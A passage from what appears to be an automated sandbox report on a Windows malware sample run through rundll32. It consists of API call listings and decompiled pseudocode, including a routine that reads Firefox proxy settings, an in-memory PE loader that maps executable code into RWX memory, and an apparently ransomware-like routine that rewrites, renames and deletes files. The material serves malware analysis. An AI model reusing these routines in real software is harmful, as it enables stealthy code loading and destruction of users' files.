0x5ade19f6
0x5ade19ed
0x5ade19e3
0x5ade1961
0x5ade196d
0x5ade1972
0x5ade1973
0x5ade1979
0x5ade197e
0x00000000
0x00000000
0x5ade197e
0x5ade1afb
0x5ade1afe
0x5ade1b01
0x5ade1b08
0x5ade1b0d
0x5ade1b0d
0x5ade1b10

APIs

VirtualAlloc.KERNELBASE(?,?,00003000,00000040,?,5ADE1CAA,016DFFF8), ref: 5ADE1954

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 00227560, Relevance: 1.3, APIs: 1, Instructions: 51

APIs

Part of subcall function 00221630: malloc.MSVCRT ref: 00221657
Part of subcall function 00221630: free.MSVCRT ref: 002216BB

Part of subcall function 00221710: free.MSVCRT ref: 0022172A

Part of subcall function 00227460: WaitForSingleObject.KERNEL32 ref: 00227488
Part of subcall function 00227460: SetEvent.KERNEL32 ref: 00227512

Sleep.KERNELBASE ref: 00227627

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002215D0, Relevance: 1.3, APIs: 1, Instructions: 24

APIs

malloc.MSVCRT ref: 002215DF

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Non-executed Functions

Function 63C07EC0, Relevance: 56.6, APIs: 28, Strings: 4, Instructions: 649

APIs

VirtualAlloc.KERNEL32 ref: 63C07F6D
memcpy.MSVCRT ref: 63C07F90
memcpy.MSVCRT ref: 63C07FDE
GetProcessHeap.KERNEL32 ref: 63C08094
HeapAlloc.KERNEL32 ref: 63C080B7
GetVersionExA.KERNEL32 ref: 63C0813D
HeapAlloc.KERNEL32 ref: 63C08186
memcpy.MSVCRT ref: 63C081A4
wcslen.MSVCRT ref: 63C081C0
wcslen.MSVCRT ref: 63C081D7
GetProcessHeap.KERNEL32 ref: 63C081F0
memcpy.MSVCRT ref: 63C08221
wcsrchr.MSVCRT ref: 63C08234
wcscat.MSVCRT ref: 63C08265
wcscat.MSVCRT ref: 63C08274
FindResourceA.KERNEL32 ref: 63C08338
CreateActCtxA.KERNEL32 ref: 63C08354
ActivateActCtx.KERNEL32 ref: 63C0836D
LoadLibraryA.KERNEL32 ref: 63C083B6
GetProcAddress.KERNEL32 ref: 63C0840C
VirtualFree.KERNEL32 ref: 63C08450
FindResourceA.KERNEL32 ref: 63C0846D
HeapAlloc.KERNEL32 ref: 63C084A1
VirtualAlloc.KERNEL32 ref: 63C08502
GetProcessHeap.KERNEL32 ref: 63C085BE
HeapAlloc.KERNEL32 ref: 63C085D7
HeapAlloc.KERNEL32 ref: 63C0866E
memcpy.MSVCRT ref: 63C086B2

Strings

, xrefs: 63C085C4
@, xrefs: 63C084E7
\, xrefs: 63C08226
, xrefs: 63C0830B

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002315D0, Relevance: 42.2, APIs: 28, Instructions: 235

APIs

calloc.MSVCRT ref: 002315F0
calloc.MSVCRT ref: 00231606
calloc.MSVCRT ref: 0023161C
wcscmp.MSVCRT ref: 00231647
free.MSVCRT ref: 002316A1
GetFileAttributesW.KERNEL32 ref: 002316AD
memset.MSVCRT ref: 002316DE
FindNextFileW.KERNEL32 ref: 0023173D
wcscmp.MSVCRT ref: 00231760
wcscmp.MSVCRT ref: 00231778
memset.MSVCRT ref: 00231794

Part of subcall function 002315D0: GetLastError.KERNEL32 ref: 002319B1
Part of subcall function 002315D0: memset.MSVCRT ref: 002319CC
Part of subcall function 002315D0: memset.MSVCRT ref: 002319E8
Part of subcall function 002315D0: free.MSVCRT ref: 002319F0
Part of subcall function 002315D0: free.MSVCRT ref: 002319F8

RemoveDirectoryW.KERNEL32 ref: 002317F8
free.MSVCRT ref: 00231813
free.MSVCRT ref: 0023181F
memset.MSVCRT ref: 00231884
memset.MSVCRT ref: 002318EA

Part of subcall function 002310B0: calloc.MSVCRT ref: 002310F6
Part of subcall function 002310B0: calloc.MSVCRT ref: 0023110E
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231128
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231140
Part of subcall function 002310B0: time.MSVCRT ref: 00231150
Part of subcall function 002310B0: srand.MSVCRT ref: 00231158
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231186
Part of subcall function 002310B0: CreateFileW.KERNEL32 ref: 0023121F
Part of subcall function 002310B0: GetFileSize.KERNEL32 ref: 0023123E
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023129C
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 002312CE
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 00231305
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 0023133B
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023137B
Part of subcall function 002310B0: SetEndOfFile.KERNEL32 ref: 00231387
Part of subcall function 002310B0: CloseHandle.KERNEL32 ref: 00231393
Part of subcall function 002310B0: _wsplitpath.MSVCRT ref: 002313D6
Part of subcall function 002310B0: rand.MSVCRT ref: 002313E5
Part of subcall function 002310B0: rand.MSVCRT ref: 00231400
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231457
Part of subcall function 002310B0: MoveFileW.KERNEL32 ref: 002314CC
Part of subcall function 002310B0: memset.MSVCRT ref: 002314F2
Part of subcall function 002310B0: DeleteFileW.KERNEL32 ref: 002314FE
Part of subcall function 002310B0: GetLastError.KERNEL32 ref: 00231510
Part of subcall function 002310B0: free.MSVCRT ref: 0023151F
Part of subcall function 002310B0: free.MSVCRT ref: 0023152B
Part of subcall function 002310B0: free.MSVCRT ref: 00231537
Part of subcall function 002310B0: free.MSVCRT ref: 00231543

FindNextFileW.KERNEL32 ref: 0023192A
memset.MSVCRT ref: 00231950
memset.MSVCRT ref: 0023196C
free.MSVCRT ref: 00231974
free.MSVCRT ref: 0023197C
free.MSVCRT ref: 00231997
free.MSVCRT ref: 002319A3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 5ADE1F27, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 162

C-Code - Quality: 93%

			E5ADE1F27(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				short _v1128;
				short _v1640;
				WCHAR* _t32;
				void* _t47;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t67;
				void* _t70;
				char* _t74;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				short* _t80;
				short* _t83;
				short* _t85;
				short* _t92;

				_v8 = 0xffffffff;
				_t32 =  &_v1128;
				__imp__SHGetSpecialFolderPathW(0, _t32, 0x1a, 0);
				if(_t32 != 0 && GetCurrentDirectoryW(0x100,  &_v1640) != 0 && SetCurrentDirectoryW( &_v1128) != 0) {
					if(SetCurrentDirectoryW(L"Mozilla\\Firefox\\Profiles") != 0) {
						_t47 = FindFirstFileW(L"*.*",  &_v616) + 1;
						if(_t47 != 0) {
							_v24 = _t47 - 1;
							while((_v616.cFileName & 0x000000ff) == 0x2e || StrStrIW( &(_v616.cFileName), L".default") == 0) {
								if(FindNextFileW(_v24,  &_v616) != 0) {
									continue;
								}
								L29:
								FindClose(_v24);
								goto L30;
							}
							if(SetCurrentDirectoryW( &(_v616.cFileName)) != 0) {
								_t61 = CreateFileW(L"prefs.js", 0x80000000, 1, 0, 3, 0x80, 0) + 1;
								if(_t61 != 0) {
									_t62 = _t61 - 1;
									_v20 = _t62;
									_t64 = CreateFileMappingW(_t62, 0, 2, 0, 0, 0);
									if(_t64 != 0) {
										_v16 = _t64;
										_t67 = MapViewOfFile(_v16, 4, 0, 0, 0);
										if(_t67 != 0) {
											_v12 = _t67;
											_t70 = GetFileSize(_v20, 0) + 1;
											if(_t70 != 0) {
												_t91 = _t70 - 1;
												_t74 = E5ADE22A9(_v12, _t70 - 1, "user_pref(\"network.proxy.type\", ");
												if(_t74 == 0) {
													L24:
													_v8 = 0;
												} else {
													if( *_t74 == 0x30) {
														_v8 = 1;
													} else {
														if( *_t74 != 0x31) {
															goto L24;
														} else {
															_t76 = E5ADE22A9(_v12, _t91, "user_pref(\"network.proxy.http\", ");
															if(_t76 != 0) {
																_t77 = _t76 + 1;
																_t80 = _a4;
																do {
																	 *_t80 =  *_t77;
																	_t80 = _t80 + 2;
																	_t77 = _t77 + 1;
																} while ( *_t77 != 0x22);
																 *_t80 = 0;
																_t92 = _t80;
																_t79 = E5ADE22A9(_v12, _t92, "user_pref(\"network.proxy.http_port\", ");
																if(_t79 != 0) {
																	_t83 = _t92;
																	 *_t83 = 0x3a;
																	_t85 = _t83 + 2;
																	do {
																		 *_t85 =  *_t79;
																		_t85 = _t85 + 2;
																		_t79 = _t79 + 1;
																	} while ( *_t79 != 0x29);
																	 *_t85 = 0;
																	_v8 = 2;
																}
															}
														}
													}
												}
											}
											UnmapViewOfFile(_v12);
										}
										CloseHandle(_v16);
									}
									CloseHandle(_v20);
								}
							}
							goto L29;
						}
					}
					L30:
					SetCurrentDirectoryW( &_v1640);
				}
				return _v8;
			}

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE1F45
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE1F5F
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1F74
SetCurrentDirectoryW.KERNEL32(Mozilla\Firefox\Profiles), ref: 5ADE1F87
FindFirstFileW.KERNEL32(*.*,?), ref: 5ADE1FA1
StrStrIW.SHLWAPI(?,.default), ref: 5ADE1FCE
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1FE3
CreateFileW.KERNEL32(prefs.js,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE2008
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE2024
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2040
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2056
UnmapViewOfFile.KERNEL32(?), ref: 5ADE20F9
CloseHandle.KERNEL32(?), ref: 5ADE2102
CloseHandle.KERNEL32(?), ref: 5ADE210B
FindNextFileW.KERNEL32(?,?), ref: 5ADE211D
FindClose.KERNEL32(?), ref: 5ADE212E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE213B

Strings

user_pref("network.proxy.http_port", , xrefs: 5ADE20AE
prefs.js, xrefs: 5ADE2003
user_pref("network.proxy.http", , xrefs: 5ADE2082
user_pref("network.proxy.type", , xrefs: 5ADE2066
*.*, xrefs: 5ADE1F9C
Mozilla\Firefox\Profiles, xrefs: 5ADE1F82
.default, xrefs: 5ADE1FC8

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 63C07F07, Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 355

C-Code - Quality: 54%

			E63C07F07(void* __ebx) {
				void* _t321;

				__eax = __esp[0x41];
				__esp[0x41][3] = 0;
				__eax =  *(__ebp + 4) & 0x0000ffff;
				__eflags = __ax - 0x8664;
				if(__ax != 0x8664) {
					__edx =  *(__ebp + 0xe8);
					__eflags =  *(__ebp + 0xe8);
					if( *(__ebp + 0xe8) != 0) {
						goto L1;
					}
					__eflags = __ax - 0x14c;
					if(__ax != 0x14c) {
						goto L1;
					}
					__eax =  *(__ebp + 0x50);
					__edi = __esp[0x41];
					__eflags = __eax;
					__esp[0xc] = __eax;
					__esp[0x41][5] = __eax;
					if(__eax == 0) {
						goto L1;
					}
					__esp[3] = 0x40;
					__esp[2] = 0x3000;
					__esp[1] = __eax;
					__eax =  *(__ebp + 0x34);
					__esi = VirtualAlloc;
					 *__esp =  *(__ebp + 0x34);
					__eax = VirtualAlloc(??, ??, ??, ??);
					__esp = __esp - 0x10;
					__eflags = __eax;
					__esp[8] = __eax;
					if(__eax == 0) {
						__eax = __esp[0xc];
						__eax = VirtualAlloc(0, __esp[0xc], 0x3000, 0x40);
						__esp = __esp - 0x10;
						__eflags = __eax;
						__esp[8] = __eax;
						if(__eax != 0) {
							goto L7;
						}
						goto L1;
					}
					L7:
					__eax =  *(__ebp + 0x54);
					__esp[1] = __ebx;
					__esp[2] =  *(__ebp + 0x54);
					__eax = __esp[8];
					 *__esp = __esp[8];
					__eax = memcpy(??, ??, ??);
					__eax =  *(__ebp + 6) & 0x0000ffff;
					__eflags = __eax;
					__esp[7] = __eax;
					if(__eax == 0) {
						L58:
						__esp[8] = VirtualFree(__esp[8], 0, 0x8000);
						__esp = __esp - 0xc;
						goto L1;
					} else {
						__eax =  *(__ebp + 0x14) & 0x0000ffff;
						__edi = 0;
						__eflags = 0;
						__esp[9] = __ebp;
						__esi = __ebp + 0x18 + ( *(__ebp + 0x14) & 0x0000ffff);
						__ebp = 0;
						__edi = __ebx;
						__ebx = __esp[8];
						do {
							__eax =  *(__esi + 0xc);
							__ecx =  *(__esi + 0x14);
							__ebp = 1 + __ebp;
							__edx =  *(__esi + 0x10);
							__esi = __esi + 0x28;
							__eax = __eax + __ebx;
							__eax = memcpy(__eax, __ecx, __edx);
							__eflags = __esp[7] - __ebp;
						} while (__esp[7] != __ebp);
						__ebp = __esp[9];
						__edi = __esp[8];
						__esi = __esp[0x41];
						__eax =  *(__ebp + 0x28);
						__eax =  *(__ebp + 0x28) + __edi;
						__edi = __edi +  *((intOrPtr*)(__edi + 0x3c));
						__esp[0x41][6] = __eax;
						__eflags =  *(__edi + 4) - 0x8664;
						__esp[0xd] = __edi;
						if( *(__edi + 4) == 0x8664) {
							__esi = __esp[0xd];
							__eax =  *(__esi + 0x30);
							__edx =  *(__esi + 0xb0);
						} else {
							__eax =  *(__edi + 0x34);
							__edx =  *(__edi + 0xa0);
						}
						__ecx = __esp[8];
						__eflags = __ecx - __eax;
						if(__ecx == __eax) {
							L24:
							__eax = GetProcessHeap();
							__eflags = __eax;
							__esi = __eax;
							if(__eax == 0) {
								__eax =  &(__esp[0x13]);
								__esp[9] =  &(__esp[0x13]);
								L38:
								__edx =  *(__ebp + 0x16) & 0x0000ffff;
								__eax = 0;
								__dx = __dx & 0x00002000;
								__eflags = __dx;
								do {
									__esi = __esp[9];
									 *(__esp[9] + __eax) = 0;
									__eax =  &(__eax[1]);
									__eflags = __eax - 0x20;
								} while (__eax < 0x20);
								__eax = __esp[8];
								__eflags = __dx;
								__esp[0x13] = 0x20;
								__esp[0x14] = 0x88;
								__esp[2] = 0x18;
								__esp[0x1a] = __eax;
								if(__dx == 0) {
									__eax = __esp[8];
									__esp[1] = 1;
									 *__esp = __esp[8];
									__eax = FindResourceA(??, ??, ??);
									__esp = __esp - 0xc;
									__esp[0x18] = 1;
								} else {
									__eax = FindResourceA(__eax, 2);
									__esp = __esp - 0xc;
									__esp[0x18] = 2;
								}
								__eflags = __eax;
								if(__eax != 0) {
									__eax = __esp[9];
									 *__esp = __esp[9];
									__eax =  *0x63c3a890();
									__esp = __esp - 4;
									__eflags = __eax - 0xffffffff;
									if(__eax != 0xffffffff) {
										__edx =  &(__esp[0x12]);
										 *__esp = __eax;
										__esp[1] =  &(__esp[0x12]);
										__eax =  *0x63c3a874();
										__esp = __esp - 8;
									}
								}
								__esi = __esp[8];
								__edx =  *(__esi + 0x3c);
								__eax =  *(__esi +  &(__edx->szCSDVersion[0x6c]));
								__eflags = __eax;
								if(__eax != 0) {
									__edi = __eax;
									__edi = __eax + __esi;
									__eax =  *(__edi + 0xc);
									__esp[0xb] = __edi;
									__esp[0xc] = __esi + __esp[0xc];
									__eflags = __eax;
									__esp[0xa] = __esi + __esp[0xc];
									if(__eax == 0) {
										L69:
										__eax = __esp[8];
										__eflags =  *(__eax + __edx + 0xc0);
										if( *(__eax + __edx + 0xc0) == 0) {
											L102:
											__esp[0xa] = 1;
											L85:
											__eax =  *(__ebp + 0x14) & 0x0000ffff;
											__esi = 0;
											__edi = __esp[9];
											__ebx = __ebp + 0x18 + ( *(__ebp + 0x14) & 0x0000ffff);
											do {
												__edx =  *(__ebx + 0x24);
												__ecx =  *0x63c3a84c;
												__edx = __edx >> 0x11;
												__eax = __edx >> 0x00000011 & 0x00000200;
												__eflags = __edx & 0x20000000;
												__ebp = __eax;
												if((__edx & 0x20000000) != 0) {
													__eflags = __edx & 0x40000000;
													if((__edx & 0x40000000) == 0) {
														__ebp = __ebp | 0x00000080;
														__eax = __eax | 0x00000010;
														__eflags = __edx;
														__eax =  <  ? __ebp : __eax;
													} else {
														__ebp = __ebp | 0x00000040;
														__eax = __eax | 0x00000020;
														__eflags = __edx;
														__eax =  <  ? __ebp : __eax;
													}
												} else {
													__eflags = __edx & 0x40000000;
													if((__edx & 0x40000000) == 0) {
														__ebp = __ebp | 0x00000008;
														__eax = __eax | 0x00000001;
														__eflags = __edx;
														__eax =  <  ? __ebp : __eax;
													} else {
														__ebp = __ebp | 0x00000004;
														__eax = __eax | 0x00000002;
														__eflags = __edx;
														__eax =  <  ? __ebp : __eax;
													}
												}
												__esp[3] = __edi;
												__esp[2] = __eax;
												__esi = __esi + 1;
												__eax =  *(__ebx + 8);
												__ebx = __ebx + 0x28;
												__esp[1] = __eax;
												__esp[8] = __esp[8] +  *((intOrPtr*)(__ebx - 0x1c));
												 *__esp = __esp[8] +  *((intOrPtr*)(__ebx - 0x1c));
												__eax =  *__ecx();
												__esp = __esp - 0x10;
												__eflags = __esp[7] - __esi;
											} while (__esp[7] != __esi);
											__eax = __esp[0xa];
											__eflags = __esp[0xa];
											if(__esp[0xa] != 0) {
												__eax = __esp[0x41];
												__esi = __esp[8];
												__esp[0x41][4] = __esp[8];
											}
											goto L1;
										}
										__eax =  *[fs:0x18];
										__esi = __esp[9];
										__esp[0xd] = __eax;
										__ebx = 0;
										__eax = __eax[0xc];
										__edi = 0;
										__esp[0x13] = __esi;
										__esp[0x14] = __esi;
										__eax = __eax[3];
										__edx = __eax[3];
										_t223 =  &(__eax[3]); // 0xc
										__esi = _t223;
										__ecx = __esi;
										__eflags = __esi - __edx;
										if(__esi == __edx) {
											L84:
											__esp[0xa] = 0;
											goto L85;
										}
										__esi = __edx;
										__esp[0xc] = __ebp;
										__edx = 0;
										while(1) {
											__eax =  *(__esi + 0x18);
											__ebp =  *__esi;
											__edi = __eax[0xf];
											__edi =  *(__eax + __eax[0xf] + 0xc0);
											__eflags = __edi;
											if(__edi == 0) {
												goto L72;
											}
											__esp[0xb] = __edx;
											__esp[0xa] = __ecx;
											__ebx = __eax + __edi;
											__edi =  *0x63c3a850;
											__eax = GetProcessHeap();
											__eax = HeapAlloc(__eax, 8, 0x20);
											__esp = __esp - 0xc;
											__eflags = __eax;
											if(__eax == 0) {
												__ebp = __esp[0xc];
												goto L84;
											}
											__edi =  *__ebx;
											__edx = 0xffffffff;
											__ecx = __esp[0xa];
											 *(__esi + 0x3a) = __dx;
											__edx = __esp[9];
											__eax[2] =  *__ebx;
											__edi =  *(__ebx + 4);
											__eax[3] =  *(__ebx + 4);
											__edi =  *(__ebx + 8);
											__eax[4] =  *(__ebx + 8);
											__edi =  *(__ebx + 0xc);
											__eax[5] =  *(__ebx + 0xc);
											__edi =  *(__ebx + 0x10);
											__eax[6] =  *(__ebx + 0x10);
											__edi = __esp[0x14];
											 *__eax = __esp[9];
											__edx = __esp[0xb];
											__eax[1] = __edi;
											 *__edi = __eax;
											__edi = __eax[4];
											__esp[0x14] = __eax;
											 *(__eax[4]) = __edx;
											__eax[7] = __edx;
											__edx =  &(__edx->dwOSVersionInfoSize);
											L72:
											__eflags = __ecx - __ebp;
											if(__ecx == __ebp) {
												__edi = __edx;
												__ebp = __esp[0xc];
												__eflags = __edi;
												if(__edi == 0) {
													goto L84;
												}
												__eax = GetProcessHeap;
												__esp[0xa] = __esi;
												__esi =  *0x63c3a850;
												__esp[0xc] = GetProcessHeap;
												__eax = GetProcessHeap();
												__ecx = __edi * 4;
												__eax = HeapAlloc(__eax, 8, __edi * 4);
												__esp = __esp - 0xc;
												__eflags = __eax;
												__edi = __eax;
												if(__eax == 0) {
													goto L84;
												}
												__eax = __esp[0xd];
												__edx = __esp[0xa];
												 *(__esp[0xd] + 0x2c) = __edi;
												__esi = __esp[0x13];
												__eflags = __esi - __esp[9];
												if(__esi == __esp[9]) {
													L97:
													__eflags = __ebx;
													if(__ebx == 0) {
														goto L102;
													}
													__ebx =  *(__ebx + 0xc);
													__esi = __edx;
													__eflags = __ebx;
													if(__ebx != 0) {
														while(1) {
															__eax =  *__ebx;
															__eflags = __eax;
															if(__eax == 0) {
																goto L102;
															}
															__esp[2] = 0;
															__esp[1] = 1;
															__ebx = __ebx + 4;
															__eflags = __ebx;
															__ecx =  *(__esi + 0x18);
															 *__esp =  *(__esi + 0x18);
															__eax =  *__eax();
															__esp = __esp - 0xc;
														}
														goto L102;
													}
													goto L102;
												}
												__esp[0xd] = __ebp;
												__esp[0xe] = __edx;
												__esp[0xf] = __ebx;
												while(1) {
													__eax =  *__esi;
													__ebp =  *(__esi + 0xc);
													__ebp =  *(__esi + 0xc) -  *(__esi + 8);
													__edx =  *0x63c3a850;
													__ecx = __esp[0xc];
													__esp[0xa] =  *__esi;
													__eax =  *(__esi + 0x1c);
													__esp[0xb] =  *0x63c3a850;
													__ebx = __edi +  *(__esi + 0x1c) * 4;
													__eax =  *(__esp[0xc])();
													__esp[2] = __ebp;
													__esp[1] = 8;
													 *__esp =  *(__esi + 0x1c);
													 *(__edi +  *(__esi + 0x1c) * 4) = __esp[0xb]();
													__eax =  *(__esi + 0x1c);
													__esp = __esp - 0xc;
													__eax =  *(__edi +  *(__esi + 0x1c) * 4);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__edx =  *(__esi + 8);
													__eax = memcpy(__eax,  *(__esi + 8), __ebp);
													__esi = __esp[0xa];
													__eflags = __esi - __esp[9];
													if(__esi == __esp[9]) {
														__ebp = __esp[0xd];
														__edx = __esp[0xe];
														__ebx = __esp[0xf];
														goto L97;
													}
												}
												__ebp = __esp[0xd];
												goto L84;
											}
											__esi = __ebp;
										}
									}
									__ebx = __esp[8];
									__esp[0xc] = __ebp;
									while(1) {
										__eax = __eax + __ebx;
										__eax = LoadLibraryA(__eax);
										__esp = __esp - 4;
										__eflags = __eax;
										__esi = __eax;
										if(__eax == 0) {
											goto L1;
										}
										__eax = __esp[0xb];
										__edi = __eax[4];
										__eax =  *__eax;
										__edx = __ebx + __eax;
										__edi = __edi + __ebx;
										__eflags = __eax;
										__edx =  ==  ? __edi : __ebx + __eax;
										__eax = __edx->dwOSVersionInfoSize;
										__ebp = __edx;
										__eflags = __eax;
										if(__eax == 0) {
											L67:
											__esp[0xb] = __esp[0xb] + 0x14;
											__eax = __esp[0xb];
											__eax =  *(__esp[0xb] + 0xc);
											__eflags = __eax;
											if(__eax != 0) {
												continue;
											}
											__eax = __esp[8];
											__ebp = __esp[0xc];
											__edx =  *(__esp[8] + 0x3c);
											goto L69;
										}
										__edx = __edi;
										__edi = __ebx;
										__ebx = __edx;
										do {
											__eflags = __eax;
											if(__eax >= 0) {
												__eax = __eax + __edi;
												__eflags = __eax;
												if(__eax < 0) {
													goto L1;
												}
												__eflags = __eax - __esp[0xa];
												if(__eax >= __esp[0xa]) {
													goto L1;
												}
												__eax =  &(__eax[0]);
												__eflags = __eax;
												L54:
												__eax = GetProcAddress(__esi, __eax);
												__esp = __esp - 8;
												__eflags = __eax;
												 *__ebx = __eax;
												if(__eax == 0) {
													goto L1;
												}
												goto L55;
											}
											__eax = __ax & 0x0000ffff;
											goto L54;
											L55:
											__ebp = __ebp + 4;
											__eax =  *__ebp;
											__ebx = __ebx + 4;
											__eflags = __eax;
										} while (__eax != 0);
										__ebx = __edi;
										goto L67;
									}
								}
								goto L1;
							}
							__eax = HeapAlloc(__esi, 8, 0x25c);
							__esp = __esp - 0xc;
							__ebx = __eax;
							__edi = __esp[0xd];
							__edx = __esp[8];
							__eax =  *(__edi + 0x50);
							 *(__ebx + 0x18) = __edx;
							 *(__ebx + 0x20) =  *(__edi + 0x50);
							 *(__edi + 0x28) =  *(__edi + 0x28) + __edx;
							 *(__ebx + 0x1c) =  *(__edi + 0x28) + __edx;
							__eax =  *(__edi + 0x58);
							 *(__ebx + 0x3c) =  *(__edi + 0x58);
							__eax = 1;
							 *(__ebx + 0x38) = __ax;
							__eax = 0xffffffff;
							 *(__ebx + 0x3a) = __ax;
							__eax =  *(__edi + 8);
							 *(__ebx + 0x34) = 0x44000;
							 *(__ebx + 0x44) =  *(__edi + 8);
							__eax = __edi;
							__eflags = __edx - __eax[0xd];
							if(__edx != __eax[0xd]) {
								 *(__ebx + 0x34) = 0x244000;
							}
							__eax = __esp[0xd];
							__eflags = __eax[5] & 0x00000020;
							if((__eax[5] & 0x00000020) != 0) {
								_t79 = __ebx + 0x34;
								 *_t79 =  *(__ebx + 0x34) | 0x00080004;
								__eflags =  *_t79;
							}
							__edi =  &(__esp[0x13]);
							__eax = 0;
							__ecx = 0x25;
							__edx = __edi;
							__esp[9] = __edi;
							__eax = memset(__edi, 0, 0x25 << 2);
							__edi = __edi + __ecx;
							__ecx = 0;
							__esp[0x13] = 0x94;
							__eax = GetVersionExA(__edx);
							__esp = __esp - 4;
							__eflags = __esp[0x14] - 6;
							if(__eflags > 0) {
								L61:
								__eax = HeapAlloc(__esi, 8, 0x30);
								_t191 = __ebx + 0x54; // 0x54
								__edx = _t191;
								__eax[8] = 9;
								__esp = __esp - 0xc;
								 *__eax = _t191;
								_t193 = __ebx + 0x58; // 0x58
								__edx = _t193;
								__eax[1] = _t193;
								 *(__ebx + 0x54) = __eax;
								 *(__ebx + 0x58) = __eax;
								 *(__ebx + 0x50) = __eax;
								goto L31;
							} else {
								if(__eflags == 0) {
									__eflags = __esp[0x15] - 1;
									if(__esp[0x15] <= 1) {
										goto L31;
									}
									goto L61;
								}
								L31:
								__eax =  *[fs:0x30];
								__ecx = ( *[fs:0x30])[3];
								__edi =  *(__ecx + 0x14);
								__esp[0xd] = __ecx;
								__eax =  *(__edi + 0x24);
								__edx =  *(__edi + 0x28);
								 *(__ebx + 0x2c) =  *(__edi + 0x24);
								__eax =  *(__edi + 0x26) & 0x0000ffff;
								 *(__ebx + 0x30) =  *(__edi + 0x28);
								__eax = HeapAlloc(__esi, 8,  *(__edi + 0x26) & 0x0000ffff);
								__edx =  *(__edi + 0x26) & 0x0000ffff;
								 *(__ebx + 0x30) = __eax;
								__esp = __esp - 0xc;
								__esi =  *(__edi + 0x28);
								__eax = memcpy(__eax,  *(__edi + 0x28),  *(__edi + 0x26) & 0x0000ffff);
								__eax = E63C07E80(0x11);
								__esi =  *(__edi + 0x1e) & 0x0000ffff;
								 *__esp = __eax;
								__esp[0xa] = __eax;
								__esi = ( *(__edi + 0x1e) & 0x0000ffff) + wcslen(??) * 2;
								__eax = __esp[0xa];
								 *(__ebx + 0x26) = __si;
								__esi =  *(__edi + 0x1c) & 0x0000ffff;
								__esi = ( *(__edi + 0x1c) & 0x0000ffff) + wcslen(__esp[0xa]) * 2;
								__eax =  *0x63c3a850;
								 *(__ebx + 0x24) = __si;
								__esi =  *(__ebx + 0x26) & 0x0000ffff;
								__esp[0xb] =  *0x63c3a850;
								__eax = GetProcessHeap();
								__esp[1] = 8;
								 *__esp = __eax;
